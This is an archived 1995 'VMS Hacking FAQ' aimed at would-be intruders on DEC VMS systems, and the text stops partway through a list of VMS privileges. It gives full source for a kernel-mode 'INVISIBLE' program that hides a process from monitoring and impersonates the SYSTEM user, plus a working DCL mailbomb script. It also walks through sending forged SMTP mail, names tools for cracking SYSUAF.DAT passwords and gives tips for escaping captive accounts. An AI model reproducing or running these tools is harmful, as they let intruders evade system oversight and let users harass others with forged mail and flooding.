Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Antique Systems :: vmshkfaq.txt

VMS Hacking FAQ




Taken from MIND LINK! on Thu Jan 26 01:54:52 1995

Mon Jan 23 05:31:25 1995
Message : #21160119    From: Beaver [SAOO]
Address : beaver@upperdck.blkbox.com
Length  : 9098 words 64202 bytes
Subject : VMS Hacking FAQ .01 Beta
Read 3 times

Msg-ID: <3g0ahe$ddh@mailer.fsu.edu>
Posted: 23 Jan 1995 13:21:50 GMT

Org.  : SAOO Upper-Deck Networked Systems


  [This is a very premature release,  but I wanted to go ahead and get it out]





                  - VMS FAQ (Frequently Ask Questions) -

                          - Beta 0.01 Release -


Introduction:

        This article contain the answers to some frequently asked question
        (Hence,  the name FAQ) about hacking the VMS operating system.

        The article may be freely redistributed in its entirety provide
        that credits are not altered or removed.   It may not be
        sold for profit or incorporated in commercial documents without
        the written permission of the author(s).

        This is the beta release of this article,   which means,
        the article is still in the working,  and is not complete.

        Submissions,  corrections,  comments,  input,  complaints,
        bomb threats,   cash,  etc.,  should be directed toward
        The Beaver (beaver@upperdck.blkbox.com).


Index ---:

More Common Newbie Questions:

1.  VMS Basic information ("What does VMS run on?")
2.  Password storage information (SYSUAF.DAT) ("Where the hell is the
    /etc/passwd file??!?!?!")
3.  Cracking the SYSUAF.DAT ("Is there a version of 'Crack' for VMS
    machines?")
4.  Becoming invisible in VMS ("Is there a 'Cloak' routine in VMS?")
5.  SET DEFAULT command ("How the do I change damn directory's?")
6.  The infamous "CD" .COM file ("I hate this SET DEFAULT crap")
7.  LOGIN.COM ("Okay,  where's my .profile???").
8.  Captive Accounts ("I can't get to DCL").

VMS Mail Hack Routines:

1.  Fake Mail ("How do I send fake mail to VMS machines?")
2.  Unix/VMS Sendmail holes ("Will my sendmail holes work on VMS?")
3.  Mail Bomb ("I need to mailbomb a user from my VMS account,  how?)

User/Image Privilege Information:

1.  Systems Privileges, Listing and explanation ("How are Priv's setup?")
2.  Creating privileged imagines ("Can I create a SUID Shell on a VMS box?")

DECNetwork Information.

1.  Brief Description of a DECNet ("What's a DECNet?")
2.  What it means to you ("What can it do for me?")
3.  Obtaining files/system info/etc ("How do I get information for the
remote?")
4.  Using remote nodes ("How do I connect interactively?")
5.  Getting node lists ("How do I find connectable nodes?")
6.  Proxy Logins ("Can't DECNet nodes be protected?")
7.  Proxy Logs ("Are Proxy logins logged? Can I use it to break into nodes?")

TCP/IP Connected VMS Machines.

1.  Obtaining remote usernames without "FINGER" ("How do I get usernames
    if FINGER is disabled")
2.  Changing the image running in FINGER ("How do I link a command name to
    another so it appears I am running a different image?")


                -      More Common Newbie Questions      -


1.      "What does VMS run on?"

        VMS (Virtual Memory System) runs on Digital Equipment Corp.
        (DEC - pronounced,  "DECK") VAX (Virtual Address eXtension)
        and the newer Alpha's.   The user uses DCL (DEC Command
        Language) to interact with the computer.  These commands
        and there syntax are completely different then those of
        Unix and Unix-like operating systems,  thus a completely
        different mindset is often required (this is the authors
        opinion).

2.      "Why A 'VMS-Hacking FAQ'?"

        Several reasons.    Once and a while,   A escape from Unix is
        very,  very nice.   Another reason is that is art of
        VMS hacking has since vanished,  and its replacement are
        statements like,  "Hacking VMS is impossible", "VMS is
        to cryptic to use",  and as always,  "Man,  VMS sucks".

        These are generally statements by people who know almost
        zero about VMS.   I don't want to go into a "which OS is
        better",  because that would defeat the purpose of this
        file",  but in my personal opinion,   both OS's have
        there advantages/disadvantages.

        I have,  however,  written this FAQ with a Unix overtone
        to it,  to help the reader understand what is trying to
        be accomplished in some examples.

3.      "Where in the hell is the passwd file???!?!?!"

        There is no /etc/passwd file.  All user information is kept in
        a file called SYSUAF.DAT,  which is stored in the directory
        (or actual the logical) SYS$COMMON.   This file is usually
        not readable by "normal" users.

4.      "Is there a version of "Crack" that I can run on a VMS machine?"

        The unix program, "Crack" will not work,  but there are password
        guessing routines available.

        The best on I have seen is "GUESS_PASSWORD.EXE",  which can be
        obtained from the following sites.

        ftp.wku.edu:/vms/fileserv/uaf.zip
        ftp.spc.edu:/macro32/savesets/uaf.zip

        In order for the routine to work,  you need access to the
        SYSUAF.DAT.  This version works on both OpenVMS VAX and
        OpenVMS AXP

5.      "Can I 'Cloak' in routine in VMS?"

        Yes.  Below is the code needed to make your process invisible
        to "FINGER",  "SHOW USERS",  etc...

        First,  create the following file:

Name: BUILD_INVISIBLE.COM
---------------------------------[Cut Here]-----------------------------------
$ save_verify = 'f$verify(0)'
$ system = "vax"        !Set to "alpha" for Alpha
$!
$!  File to build Ehud Gavron's INVISIBLE
$!
$!  Author:     Hunter Goatley
$!
$ say := write sys$output
$ on error then goto common_exit
$ on contrl_y then goto common_exit
$ say "Extracting $JIBDEF and $PCBDEF from LIB.MLB...."
$ library/macro/extr=$JIBDEF/out=jibdef.mar sys$library:lib.mlb
$ library/macro/extr=$PCBDEF/out=pcbdef.mar sys$library:lib.mlb
$ say "Converting $*DEF macros to C .H files...."
$ call convert_to_h jibdef.mar
$ call convert_to_h pcbdef.mar
$ say "Compiling INVISIBLE...."
$ cc invisible
$ say "Linking INVISIBLE...."
$ link/notrace invisible,invisible.opt_'system'/opt
$ say "INVISIBLE build completed"
$ common_exit:
$       exit f$verify(save_verify).or.1
$ convert_to_h: subroutine
$ name = f$parse(p1,"","","NAME")
$ open/read tmp 'p1'
$ create 'name'.H
$ open/append tmph 'name'.H
$ cvt_loop:
$    read/error=cvt_fin tmp line
$    if f$extract(0,4,line).nes."$EQU" then goto cvt_loop
$    write tmph "#define ",f$extract(4,255,line)
$    goto cvt_loop
$ cvt_fin:
$    close tmp
$    close tmph
$ write sys$output "C header file ''name'.H created"
$ exit
$ endsubroutine
-------------------------------[End Of File]-----------------------------------

        Next is the C Code for the "INVISIBLE" routine....


Name:  INVISIBLE.C
---------------------------------[Cut Here]------------------------------------
/*
 * Invisible    - Make a process invisible and visible again.  Originally
 *                written in MACRO32.  Now in C so it runs on Alpha too.
 *
 *
 *      Option file invisible.opt:
 *              ALPHA:  sys$loadable_images:sys$base_image.exe/share
 *
 *              VAX:    sys$system:sys.stb/selective_search
 *
 *
 *      Build:
 *              $ cc invisible
 *              $ link invisible,invisible/opt
 *
 *      Usage:
 *              $ run invisible
 *
 *
 *  Ehud Gavron
 *  ACES Consulting Inc.
 *  Gavron@ACES.COM
 *
 *      14-Oct-1992     Ehud Gavron     Ported to C, Alpha, ANSI, and
 *                                      everything else.
 *
 */

#define module_name INVISIBLE
#define module_version "V1.0.0"

#ifdef __alpha
#pragma module module_name module_version
#else /* __vax */
#module module_name module_version
#endif /* __alpha */

#ifndef __alpha
#define sys$gl_ijobcnt sys$gw_ijobcnt
#endif

#include <descrip.h>
#include "jibdef.h"     /* Extracted from LIB.MLB and massaged into C form */
#include "pcbdef.h"     /* Extracted from LIB.MLB and massaged into C form */
#include <ssdef.h>
#include <jpidef.h>
#include <psldef.h>
#include <lnmdef.h>
typedef union {
        struct {
                short s_buflen;
                short s_itemcode;
                char *s_bufaddr;
                int *s_retlen;
                } s;
        unsigned long end;
        } ITEMLIST;

#define buflen          s.s_buflen
#define itemcode        s.s_itemcode
#define bufaddr         s.s_bufaddr
#define retlen          s.s_retlen

struct ISB {
        int     l_uic;
        int     l_namelen;
#ifdef __alpha
        int     l_jobtype;
#else
        char    b_jobtype;
#endif
        char    b_terminal;
        char    t_lname[PCB$S_LNAME + 1];
        char    t_username[JIB$S_USERNAME + 1];
        };

struct ISB isb;
static int lnm_retlen;

ITEMLIST lnm_itmlst[2];
ITEMLIST jpi_itmlst[2];
struct dsc$descriptor_s prcnam_desc;
struct dsc$descriptor_s prcnam;
$DESCRIPTOR(lnm_tabnam,"LNM$PROCESS_TABLE");
$DESCRIPTOR(lnm_lognam,"ISB");
$DESCRIPTOR(fao_prcnam,"SYMBIONT_!UL");
int sysuic = 0x00010004;
char sysusername[] = "SYSTEM        ";
char namebuf[PCB$S_LNAME];

#ifdef __alpha
main()
#else
cmain()
#endif
{
        int sys$cmkrnl(),sys$exit(),invisible_k();
        int ss_stat;

        lnm_itmlst[0].buflen = sizeof(isb);
        lnm_itmlst[0].itemcode = LNM$_STRING;
        lnm_itmlst[0].bufaddr = (char *)&isb;
        lnm_itmlst[0].retlen = &lnm_retlen;
        lnm_itmlst[1].end = 0;

        jpi_itmlst[0].buflen = PCB$S_LNAME;
        jpi_itmlst[0].itemcode = JPI$_PRCNAM;
        jpi_itmlst[0].bufaddr = (char *)&isb.t_lname;
        jpi_itmlst[0].retlen = (int *)&isb.l_namelen;
        jpi_itmlst[1].end = 0;

        prcnam_desc.dsc$a_pointer = (char *)&isb.t_lname;
        prcnam_desc.dsc$w_length = PCB$S_LNAME;
        prcnam_desc.dsc$b_dtype = DSC$K_DTYPE_T;
        prcnam_desc.dsc$b_class = DSC$K_CLASS_S;

        prcnam.dsc$a_pointer = (char *)&namebuf;
        prcnam.dsc$w_length = PCB$S_LNAME;
        prcnam.dsc$b_dtype = DSC$K_DTYPE_T;
        prcnam.dsc$b_class = DSC$K_CLASS_S;

        ss_stat = sys$cmkrnl(invisible_k,0);
        (void) sys$exit(ss_stat);
}

int invisible_k()
{
        int sys$getjpiw(),sys$crelnm(),sys$fao(),sys$setprn();
        int strncpy(),sys$exit(),sys$trnlnm(),sys$dellnm();
        int *a_long;
        int acmode = PSL$C_KERNEL;

#pragma nostandard                      /* Oh well */
        globalref ctl$gl_pcb;
        globalref sys$gl_ijobcnt;
#pragma standard

        int ss_stat;
        char *pcb;
        char *jib;
        long *sts;
        long *own;
        char *p;
        long *q;
        int loop = 0;

        pcb = (char *)ctl$gl_pcb;

        if (pcb == 0) {
           return(0);
           }
        q = (long *)((char *)pcb + PCB$L_JIB);
        jib =(char *)  *q;

        sts = (long *)((char *)pcb + PCB$L_STS);

        if (*sts & PCB$M_INTER) {       /* Do stealth mode */
           *sts = *sts^PCB$M_INTER;
           *sts = *sts|PCB$M_NOACNT;

           own = (long *)((char *)pcb + PCB$L_OWNER);
           if (*own == 0) {  /* We are not a subprocess  */
              sys$gl_ijobcnt--;
              }

           p = (char *)pcb + PCB$T_TERMINAL;
           isb.b_terminal = *p;
           *p = '\0';


#ifdef __alpha
           q = (long *)((char *)jib + JIB$L_JOBTYPE);
           isb.l_jobtype = *q;
           *q = 0;
#else
           p = (char *)jib + JIB$B_JOBTYPE;
           isb.b_jobtype = *p;
           *p = '\0';
#endif
           strncpy((char *)&isb.t_username,
                   (char *)(jib + JIB$T_USERNAME),
                   JIB$S_USERNAME);

           strncpy((char *)(jib + JIB$T_USERNAME),
                   (char *)&sysusername,
                   JIB$S_USERNAME);

           q = (long *)((char *)pcb + PCB$L_UIC);
           isb.l_uic = *q;
           *q = sysuic;

           ss_stat = sys$getjpiw(0,0,0,&jpi_itmlst,0,0,0);
           if (!(ss_stat & 1)) return(ss_stat);
           ss_stat = sys$crelnm(0,
                                &lnm_tabnam,
                                &lnm_lognam,
                                &acmode,
                                &lnm_itmlst);
           if (!(ss_stat & 1)) return(ss_stat);
           do {
              loop++;
              prcnam.dsc$w_length = PCB$S_LNAME;
              ss_stat = sys$fao((char *)&fao_prcnam,
                                (char *)&prcnam.dsc$w_length,
                                (char *)&prcnam,
                                loop);
              if (!(ss_stat &1)) return(ss_stat);
              ss_stat = sys$setprn((char*)&prcnam);
              } while (ss_stat == SS$_DUPLNAM);
           return(SS$_NORMAL);
           }
        else {  /* unstealth */
           ss_stat = sys$trnlnm(0,
                                &lnm_tabnam,
                                &lnm_lognam,
                                &acmode,
                                &lnm_itmlst);
           if (!(ss_stat & 1)) return(ss_stat);

           ss_stat = sys$dellnm(&lnm_tabnam,
                                &lnm_lognam,
                                &acmode);
           if (!(ss_stat & 1)) return(ss_stat);

           *sts = *sts|PCB$M_INTER;
           *sts = *sts^PCB$M_NOACNT;

           own = (long *)((char *)pcb + PCB$L_OWNER);
           if (*own == 0) {  /* We are not a subprocess  */
              sys$gl_ijobcnt++;
              }

           q = (long *)((char *)pcb + PCB$L_UIC);
           *q = isb.l_uic;

           p = (char *)pcb + PCB$T_TERMINAL;
           *p = isb.b_terminal;

#ifdef __alpha
           q = (long *)((char *)jib + JIB$L_JOBTYPE);
           *q = isb.l_jobtype;
#else
           p = (char *)jib + JIB$B_JOBTYPE;
           *p = isb.b_jobtype;
#endif
           strncpy((char *)(jib + JIB$T_USERNAME),
                   (char *)&isb.t_username,
                   JIB$S_USERNAME);

           prcnam_desc.dsc$w_length = (short)isb.l_namelen;
           ss_stat = sys$setprn(&prcnam_desc);
           return;
        }
}

#ifndef __alpha
int strncpy(a,b,c)
char *a,*b;
int c;
{
        for (; c > 0; c--) {
          *a++ = *b++;
          }
}
#endif
--------------------------------[End Of File]----------------------------------

        After these files are created,   type in the following at your
        DCL prompt:

$ @build_invisible      ! This will build our INVISIBLE.EXE routine.
$ run invisible         ! One the build is complete.

        You should be completely "cloaked".

        To obtain full source, readme files,  etc,  you can obtain this
        program from:

        ftp.wku.edu:/vms/fileserv/invisible.zip
        ftp.spc.edu:/macro32/savesets/invisible.zip

4.      "How do I change damn directory's?".

        This is done via the "SET DEFAULT" command.  In the following
        format:

$ SET DEFAULT device:[directory]


        VMS uses a standard hierarchy system,  in which devices and
        directory's are separated.  For example,  our home device/directory
        might be:

        DISK3:[USR.JOEHACKER]

        DISK3:  would represent the device that we are on/using
        while,  [USR.JOEHACKER] would signify the actual directory
        on that device that we are using.  So,  to change directory's,
        we could type:

$ SET DEFAULT [USR.BOB]

        If [USR.BOB] is a existing directory,  this would now be our
        current path (and we would still be located on the DISK3:
        device.  If we wanted to simply back out one level (to the
        [USR]) on that device,  we would issue the following command:

$ SET DEFAULT [-]

        The "[-]" signifies one directory back.  So if our path is,
        [USR.BOB.HACKING.VMS.PROGRAMS],  and we want to get to the
        [USR.BOB] directory,  instead of typing the entire path
        again,  we could simply type:

$ SET DEFAULT [---]

        "[---]" means,  back out three levels of the hierarchy.

        There can be several devices on one VMS system (Device names
        can be obtained via a "SHOW DEVICES").  While your
        home directory might be on DISK3,   another users could
        be on device DISK2.   To switch devices, we can add in
        the device name,  followed by the directory (if needed).
        So,  if you need to get to a users who stores information
        in the DISK2:[REALLY.SECRET.STUFF] directory,  you could
        type the following DCL command:

$ SET DEFAULT DISK2:[REALLY.SECRET.STUFF]

        Or if we are currently in the "DISK3:[REALLY]" and we want
        to get to the information in the "DISK2:[REALLY]" directory,
        we could simply type

$ SET DEFAULT DISK2:

        And the rest would be carried over.

        In the event that you need to get to the top of the hierarchy
        (Unix equivelant:  "cd /"),  SET DEFAULT (to any disk structured
        device) to "[000000]".  For example,  to get to the very
        top of the hierarchy on device DISK2,  you would type.

$ SET DEFAULT DISK2:[000000]

        VMS will also allow you to SET DEFAULT to a directory that does
        not exist.  When this happens,  the operating system will
        inform you of this when you try to issue a command that requires
        some sort of file I/O.   If at any point you get completely
        lost,  you can return to your "home" directory by typing

$ SET DEFAULT SYS$LOGIN:


6.      "I hate this SET DEFAULT crap.  Can I just use 'cd' command like
         I do in Unix?".

        By default,  no.  There are two things that you can do.
        One,  add the following line to your "LOGIN.COM" (see
        where my .profile in VMS' for more information)


$ CD :== SET DEFAULT    ! I am hate typing that long "SET DEF" command

        Or you can us the following .COM file,  which will guarrent
        that you eat as many resources as you can......

              [Taken from Phrack,  Vol. 2.  Issue 19.,  File 2]
                           [ Coded By The Mentor ]

                              Code for CD.COM
                               >>>>>>>>>>>>>>>

$! CD.COM v6.09
$! The Ultimate Change Directory Command.
$!
$  hdir     = f$trnlnm("SYS$LOGIN")                 ! Home Directory
$  ndir     = f$edit(p1,"UPCASE")                   ! New  Directory
$  odir     = f$environment("DEFAULT")              ! Old  Directory
$  prompton = (f$edit(f$trnlnm("SYS$PROMPT"),"UPCASE") .eqs. "ON")
$!
$  if (ndir .eqs. "")           then goto DISPLAY   ! No Dir
$  if (ndir .eqs. "*")          then goto DIRSEARCH ! Search for Dirs
$  if (ndir .eqs. "?")          then goto HELP      ! Instructions
$!
$  PARSE:
$  length   = f$length(ndir)                        ! Fix up ndir
$  if (f$location("@",ndir) .eq. 0) .or. -
      (f$location("$",ndir) .eq. 0) then ndir = f$extract(1, length - 1, ndir)
$  right    = f$location("]",ndir) + 1
$  if (right .gt. length) then right = f$location(">", ndir)
$  if (right .le. length) then ndir  = f$extract(0, right, ndir)
$!
$  if (f$trnlnm(ndir) .eqs. "") then goto CASESYM   ! Not Logical Name
$     ndir   = f$trnlnm(ndir)                       ! Logical Name
$     goto PARSE
$!
$  CASESYM:
$  if ("''&ndir'" .eqs. "")     then goto CASE0     ! Not Symbol
$     ndir = 'ndir'                                 ! Symbol
$     goto PARSE
$!
$  CASE0:
$  len_ndir = f$length(ndir)                        ! Regular Dir
$  if (f$location("[", ndir) .lt. len_ndir) .or. -
      (f$location("<", ndir) .lt. len_ndir) then goto SETDIR
$!
$  CASE1:                                           ! Home Dir
$  if ((ndir .nes. "HOME") .and. (ndir .nes. "\")) then goto CASE2
$     ndir = hdir
$     goto SETDIR
$!
$  CASE2:                                           ! . .. .dir
$  if (f$location(".", ndir) .nes. 0) then goto CASE3
$     if (ndir .eqs. "..") then ndir = "-"
$     if (f$extract(0, 2, ndir) .eqs. "..") -
         then ndir = "-" + f$extract(1, len_ndir - 1, ndir)
$     ndir = "[" + ndir + "]"
$     if (ndir .eqs. "[.]") then ndir = odir
$     goto SETDIR
$!
$  CASE3:                                           ! :
$  if (f$location(":", ndir) .ge. len_ndir) then goto CASE4
$     left    = f$location(":", ndir) + 1
$     symbol  = f$extract(left, 1, ndir)
$     if (symbol .eqs. ":")  then goto CASE3B       ! :: Node
$     if ((symbol .eqs. "[") .or. (symbol .eqs. "<")) then goto SETDIR
$        ndir = f$extract(0, left, ndir) + "[" -
              + f$extract(left, len_ndir - left+1, ndir) + "]"
$     goto SETDIR
$!
$  CASE3B:                                          ! NODE::nothing
$  if (f$length(ndir)-1 .gt. left) then goto CASE3C
$     ndir = ndir + "[000000]"
$     goto SETDIR
$!
$  CASE3C:                                          ! NODE::directory
$  if ((f$location("[", ndir) - f$location("<", ndir)) .ne. 0) -
      then goto SETDIR
$
$     ndir = f$parse(ndir,,,"NODE") + "[" + f$parse(ndir,,,"NAME") + "]"
$     goto SETDIR
$!
$  CASE4:                                           ! dir
$  ndir = "[" + ndir + "]"
$!
$  SETDIR:
$  set default 'ndir'
$  if (f$parse("") .eqs. "") then goto DIRERROR
$!
$  DISPLAY:
$  if ((ndir .nes. "") .and. prompton) then goto NODISPLAY
$     hnode = f$getsyi("NODENAME")
$     cnode = f$parse(f$trnlnm("SYS$DISK"),,,"NODE") - "::"
$     if (cnode .eqs. "") then cnode = hnode
$     cdir  = f$environment("DEFAULT")
$     write sys$output " "
$     write sys$output "          Home Node: ", hnode
$     write sys$output "     Home Directory: ", hdir
$     if (cdir .eqs. hdir) .and. (cnode .eqs. hnode) then goto DISPSKIP
$     write sys$output "       Current Node: ", cnode
$     write sys$output "  Current Directory: ", cdir
$  DISPSKIP:
$     write sys$output " "
$!
$  NODISPLAY:
$  ndir = f$environment("DEFAULT")
$  if .not. prompton then goto END
$!
$  if (f$length(ndir) .ge. 32) then goto TOOLONG
$!
$  SETPROMPT:
$  set prompt = 'ndir'" "
$!
$  END:
$  exit
$!
$  DIRERROR:
$  write sys$output " "
$  write sys$output "          ", ndir, " Directory does not exist!"
$  write sys$output " "
$  set default 'odir'
$  ndir = odir
$  goto NODISPLAY
$!
$! Prompt Problems------------------------------------------------------------
$!
$  TOOLONG:
$! Prompt is too long. Get rid of everything to the left of [ or <. If that
$! doesn't work, get rid of a subdirectory at a time.  As a last resort,
$! set the prompt back to $.
$!
$  left     = f$location("[", ndir)
$  len_ndir = f$length(ndir)
$  if (left .ge. len_ndir) then left = f$location("<",ndir)
$  if (left .gt. 0) .and. (left .lt. len_ndir) -
      then ndir = f$extract(left, len_ndir - left, ndir)
$!
$  STILLTOOLONG:
$    if (f$length(ndir) .lt. 32) then goto SETPROMPT
$    left     = f$location(".", ndir) + 1
$    len_ndir = f$length(ndir)
$    if left .ge. len_ndir then ndir = "$ "
$    if left .ne. len_ndir -
        then ndir = "[*" + f$extract(left, len_ndir - left, ndir)
$    goto STILLTOOLONG
$!
$! Wildcard Directory---------------------------------------------------------
$!
$  DIRSEARCH:
$  error_message = f$environment("MESSAGE")
$  on control_y then goto DIREND
$  on control_c then goto DIREND
$  set message/nosev/nofac/noid/notext
$  write sys$output " "
$  dispct = 1
$  dirct  = 0
$  pauseflag = 1
$!
$  DIRLOOP:
$    userfile = f$search("*.dir")
$    if (userfile .eqs. "") .and. (dirct .ne. 0) then goto DIRMENU
$    if (userfile .eqs. "") then goto DIRNONE
$    dispct = dispct + 1
$    dirct  = dirct  + 1
$    on severe then $ userprot = "No Priv"
$    userprot = f$file_attributes(userfile,"PRO")
$    if userprot .nes. "No Priv" then userprot = " "
$    userfile'dirct' = "[." + f$parse(userfile,,,"NAME") + "]"
$    userprot'dirct' = userprot
$    lengthflag = (f$length(userfile'dirct') .gt. 18)
$    if lengthflag then write sys$output -
        f$fao("  !3SL   !34AS  ", dirct, userfile'dirct'), userprot'dirct'
$    if (.not. lengthflag) then write sys$output -
        f$fao("  !3SL   !20AS  ", dirct, userfile'dirct'), userprot'dirct'
$    if (dispct .lt. 8) then goto DIRLOOP
$    dirct  = dirct  + 1
$    userfile'dirct' = ""
$    dirct  = dirct  + 1
$    userfile'dirct' = ""
$    if pauseflag then goto DIRMENU
$    dispct = 0
$    goto DIRLOOP
$!
$  DIRMENU:
$  write sys$output " "
$  if (userfile .eqs. "") then goto DIRMENU2
$     write sys$output "    M   More subdirectories"
$  if pauseflag then -
$     write sys$output "    N   More subdirectories/No pause"
$!
$  DIRMENU2:
$     write sys$output "    R   Re-Display subdirectories"
$     write sys$output "    Q   Quit (default)"
$
$  DIRINQUIRE:
$  write sys$output " "
$  inquire dirchoice "  Select One"
$  write sys$output " "
$!
$  if (dirchoice .gt. 0)    .and. -
      (dirchoice .le. dirct) then goto DIRCASEDIGIT
$  dirchoice = f$edit(dirchoice,"UPCASE")
$  if (dirchoice .eqs. "")  .or. -
      (dirchoice .eqs. "Q")  then goto DIRCASEBLANK
$  if (dirchoice .eqs. "M") .or. -
      (dirchoice .eqs. "N")  then goto DIRCASEMORE
$  if (dirchoice .eqs. "R")  then goto DIRCASERED
$!
$  DIRCASERROR:
$  if (dirct .eq. 1)   then write sys$output -
      "  Select 1 to change to the ", userfile1, " subdirectory. "
$  revdirct = dirct
$  if (dispct .eq. 8) then revdirct = revdirct - 2
$  if (dirct .gt. 1)   then write sys$output -
      "  Valid subdirectory selections are 1 through ", revdirct, " (Octal)."
$  goto DIRINQUIRE
$!
$  DIRCASEDIGIT:
$  if (userfile'dirchoice' .eqs. "") then goto DIRCASERROR
$  ndir = userfile'dirchoice'
$  goto DIREND
$!
$  DIRCASEBLANK:
$  write sys$output "  Subdirectory not changed."
$  write sys$output " "
$  goto DIREND
$!
$  DIRCASEMORE:
$  dispct = 0
$  if (dirchoice .eqs. "N") then pauseflag = 0
$  if (userfile .nes. "")   then goto DIRLOOP
$  write sys$output "  No more subdirectories to display."
$  goto DIRINQUIRE
$!
$  DIRCASERED:
$  dispct = 1
$  DISPLOOP:
$     if (userfile'dispct' .eqs "") then goto DISPDONT
$     lengthflag = (f$length(userfile'dispct') .gt. 18)
$     if lengthflag then write sys$output -
         f$fao("  !3SL   !34AS  ", dispct, userfile'dispct'), userprot'dispct'
$     if (.not. lengthflag) then write sys$output -
         f$fao("  !3SL   !20AS  ", dispct, userfile'dispct'), userprot'dispct'
$     DISPDONT:
$     dispct = dispct + 1
$     if (dispct .le. dirct) then goto DISPLOOP
$  goto DIRMENU
$!
$  DIRNONE:
$  write sys$output "No subdirectories to choose, or no directory privileges."
$  write sys$output " "
$  goto DIREND
$!
$  DIREND:
$  set message 'error_message'
$  on control_y then exit
$  on control_c then exit
$  if (ndir .eqs. "*") then goto DISPLAY
$  goto PARSE
$!
$!-Help-----------------------------------------------------------------------
$!
$  HELP:
$  type sys$input

               CD.COM  Version 6  VMS Change Directory Command

                         Usage:  CD command/directory

CD         Display home directory,       CD ..       Change directory to the
           current directory, node.      CD [-]      dir above current dir.

CD \       Change directory to your      CD ..sub    Change directory to a
CD HOME    SYS$LOGIN directory.          CD [-.sub]  "sideways" subdirectory.

CD dir     Change directory to the       CD *        Display/select the
CD [dir]   [dir] directory.                          available subdirectories.

CD .sub    Change directory to the       CD .        Reset current directory.
CD [.sub]  [.sub] subdirectory.          CD ?        Display CD instructions.

     CD :== @SYS$LOGIN:CD.COM                 DEFINE SYS$PROMPT "ON"
     To make CD available from                To have the VMS $ prompt
     any directory you change to.             display the current directory.

                              By The Mentor
$  goto END


        Once uploaded,  you should add the following line you your
        LOGIN.COM:

$ CD :== @DEVICE:[PATH]CD.COM  ! Replace DEVICE/PATH with user information

7.      "Okay,  where my .profile"

        Easy.  There is none.  VMS startup routines (for personal accounts)
        can be found in the user's home directory under the name
        "LOGIN.COM".

8.      "I can't seem to get to the DCL prompt"

        It is possible to setup "CAPTIVE" accounts under VMS.  When setup
        correctly,  these can be difficult to break out of,   however,
        in alot of cases, a simple control-C while the LOGIN.COM
        is executing.  Another method of keeping the LOGIN.COM
        (or any commands for that fact) is to login with the
        "/NOCOMMAND" flag.  This flag is placed after your username
        at the USERNAME prompt,  and will bypass any account startup
        files/commands.    On a correctly setup captive account,
        this will bomb out.    In the even that this fails,   some
        places slip up by allowing a parent to spawn off other
        processes.  For example,  if the captive account puts you
        into FTP,  or ALL-IN-ONE (Office automation/mail package),
        it might be able to 'SPAWN' out to DCL.   This can also
        be prevented by simply setting up process limitation
        on the account.

                 -       VMS SMTP/Mail Information.     -


1.      "I am attempting to send fakemail by connecting to the SMTP port,
but everytime I issue the 'mail from',  it gives me a 'Mailbox syntax
incorrect', or 'Bad arguments'.  I try the standard format a *always*
use,  but it *still* gives me this crap!  What's the problem?"......

        Of course,  it is possible to send fake mail by connecting to
the VMS machines SMTP (Simple Mail Transfer Protocol) port (25),
however,  VMS "sendmail" routines tend to be a little more picky.  For
example,  the session below would *appear* that it should work...

------<Start Session>-------

telnet 6.6.6.6 25
Type ^] (decimal 29) <CR> to return to NetBlazer
Trying 6.6.6.10:25...
Telnet session 0 connected to bogus.add.com
220 BOGUS.ADD.COM TGV MultiNet V3.3 Rev C SMTP service ready at Fri, 6 Jan 1995
6:25:01 -0500 (EST)
helo
250 BOGUS.ADD.COM ; Hello , pleased to meet you.
mail from: bob@unknown
553 Mailbox syntax incorrect
quit
221 BOGUS.ADD.COM TGV MultiNet V3.3 Rev C SMTP service complete at Fri, 6 Jan
19
95 6:25:22 -0500 (EST)
Telnet session 0 closed: EOF

-------<End Session>---------

        As you can see, however,  this is not the case.  Where is problem
lies is in the fact,  that alot of VMS sendmail routines require "<", and
">" around "mail from" and "rcpt to" commands,  and sometimes a address
(Especially the case with Multinet SMTP,  and Pathway's Wollangong
Sendmail).   In order to get a good mailing address to "work",  try
"mail from: <bob@bogus.add.com>".   Some VMS SMTP services do not require
the address,  but in most cases,  the ">" and "<" are required.  The
same applys with the "rcpt to" command.  You might need to format it
the same as the "mail from".  I.E. - "rcpt to: <system>" or "rcpt to:
<system@bogus.add.com>".



2.     "Can I use my favorite Unix sendmail holes on VMS sendmail?"

        Don't be silly.  No...  Digital did not believe that sendmail
        bugs and holes where important enough to port (grin).  (It
        has been rumored that one sendmail hole *was* actually ported,
        but as of this time,  this has not be verified.

3.      "How can I code a mail bomb routine,  so that I can piss off
         people really good and eat 'bandwidth'."

        Like this,  below...

$! Simple VMS Mailbomb routine.
$! Please be someone human.   Don't do this crap.
$!
$ say :== write sys$output
$ on error then goto err
$ if p4 .eqs. ""
$ then
$ say "Mailbomb V1.0                            Coded By The Beaver"
$ say "1995"
$ say ""
$ say "Usage:"
$ say "MAILBOMB [Msg Subject] [File to bomb with] [Username] [# of Times]"
$ exit
$ endif
$ A=1
$ loop:
$ mail/subject='p1' 'p2' 'p3'
$ A = A + 1
$ if A .eqs. p4
$       then
$       say "Bomb Is Complete"
$       exit
$       endif
$ goto loop
$ err:
$ say "A Error has occured.  Be sure all file are present and correct"
$ exit


              -      User/Image Privilege Informations     -


1.      "How are user privileges setup?"

        User privleges are handled in a completely different manor
        than Unix handles them.  With unix,  you have either

        a> all priveleges (IE - "root")
        b> standard user

        VMS is a touch different.

        For example,  let say you have a field engineer that needs
        a standard user account (I.E. - be able to send/receive mail,
        do standard DCL commands.. Normal TMPMBX, NETMBX,  and
        all that),  but in order to do his job,  he needs to run the
        online VMS diagnostics software (which is a privileged operation)
        When you add the user,  you can grant him "DIAGNOSE" privledges,
        and normal user privileges,  and he will be able do regular users
        commands and run diagnostics.

        What this means is that you can grant certain privileged
        function to certain users,  rather than giving the user
        "the whole system".

        This user we added would only have access to privileges that deal
        with the diagnostic software.  For example,  he could not add
        users (via "AUTHORIZE" or modify the SYSUAF.DAT).

"Privileges restrict the user of certain system functions to processes
created on the behalf of authorized users.  These restrictions protect
the integrity of the operating system code,  data,  and resources and
thus,  the integrity of user services."

"Users cannot execute an image that requires a privilege they do not
possess,  unless the image is installed as a known image with the
privilege in question or the image runs within a protected subsystem"

        Privileges can also be installed on images,  so that when that
        image is executed,  that images process get the permissions
        that it has been granted (this does not mean that the user gets
        the privileges,  but rather,  just the process running this
        task)

                        - OpenVMS VAX Guide To System Security
                          (6.0 manual).

        Below is a listing of privileges,  and a brief description.


ACNT      -     Lets a process use the RUN (Process) command to create
                Process ($CREPRC) system service to create processes
                in which accounting is disabled.  A process in which
                account is disabled is on whose resources are not logged.

ALLSPOOL  -     This privlege lets user's process allocate a spooled
